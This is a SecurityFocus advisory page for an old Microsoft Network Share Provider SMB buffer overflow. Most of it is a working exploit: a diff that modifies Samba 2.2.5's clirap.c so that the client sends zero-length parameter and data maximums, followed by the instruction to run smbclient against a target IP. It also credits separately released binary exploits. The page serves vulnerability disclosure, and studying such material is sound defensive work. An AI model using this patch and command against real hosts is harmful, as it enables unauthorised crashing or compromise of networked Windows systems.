Microsoft Network Share Provider SMB Request Buffer Overflow Vulnerability

A Samba patch which allows exploitation of this issue is available:

Patch for samba-latest.tar.gz

Exploit with:

smbclient -L <targetIP> -N

--------------------

--- samba-2.2.5.original/source/libsmb/clirap.c Tue Jun 18 21:13:44 2002
+++ samba-2.2.5.exploit/source/libsmb/clirap.c Fri Aug 16 22:17:45 2002
@@ -237,8 +237,10 @@
STR_TERMINATE | STR_CONVERT | STR_ASCII);

if (cli_api(cli,
- param, PTR_DIFF(p,param), 8, /* params, length, max */
- NULL, 0, CLI_BUFFER_SIZE, /* data, length, max */
+// param, PTR_DIFF(p,param), 8, /* params, length, max */
+// NULL, 0, CLI_BUFFER_SIZE, /* data, length, max */
+ param, PTR_DIFF(p,param), 0,
+ NULL, 0, 0,
&rparam, &rprcnt, /* return params, return size */
&rdata, &rdrcnt /* return data, return size */
)) {

--------------------

A binary exploit has also been released. This exploit code has not been tested by Symantec. As always, caution is advised when dealing with binary code received from unknown sources. Exploit credit is given to Zamolx3 <zamolx3@personal.ro>.

An exploit has been provided by Frederic Deletang <df@phear.org>.

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.


 

Privacy Statement
Copyright 2010, SecurityFocus